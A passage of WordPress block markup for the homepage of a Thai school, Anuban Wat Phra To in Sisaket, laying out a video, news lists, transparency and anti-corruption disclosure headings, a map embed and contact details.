{\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe 